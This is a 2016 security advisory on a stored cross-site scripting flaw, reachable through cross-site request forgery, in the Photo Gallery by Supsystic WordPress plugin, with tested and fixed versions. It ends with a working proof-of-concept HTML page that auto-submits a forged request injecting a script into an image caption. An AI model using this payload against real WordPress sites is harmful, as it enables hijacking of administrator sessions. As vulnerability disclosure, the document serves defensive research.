Umit Aksu, July 2016

Stored Cross-Site Scripting vulnerability in Photo Gallery WordPress Plugin

Abstract

A Cross-Site Scripting vulnerability was found in the Photo Gallery by Supsystic WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160722-0004

Tested versions

This issue was successfully tested on Photo Gallery by Supsystic WordPress Plugin version 1.8.5.

Fix

This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

Introduction

The Photo Gallery by Supsystic WordPress Plugin can be used to create portfolios and image galleries. A Cross-Site Scripting vulnerability was found in the Photo Gallery by Supsystic WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.

Details

It is possible to deliver a Cross-Site Scripting attack through Cross-Site Request Forgery. The caption text in the gallery is vulnerable to a stored Cross-Site Scripting. The Cross-Site Scripting attack is normaly only exploitable if the attacker has admin privileges. However, no measures are implemented to protect against Cross-Site Request Forgery on the request that saves the image details. Due to this, it is possible to exploit this issue via Cross-Site Request Forgery.

Proof of concept

<html>
   <body>
      <form method="post" action="http://<target>/wp-admin/admin-ajax.php">
         <input type="hidden" name="caption" value='this is the caption"><script>alert("Fromfff CSRF to XSS!");</script>'>
         <input type="hidden" name="captionEffect" value="quarter-slide-up">
         <input type="hidden" name="description" value="">
         <input type="hidden" name="alt" value="Capture">
         <input type="hidden" name="link" value="">
         <input type="hidden" name="cropPosition" value="center-center">
         <input type="hidden" name="replace_attachment_id" value="">
         <input type="hidden" name="image_id" value="13">
         <input type="hidden" name="attachment_id" value="10">
         <input type="hidden" name="gallery_id" value="6">
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="route[module]" value="photos">
         <input type="hidden" name="route[action]" value="updateAttachment">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>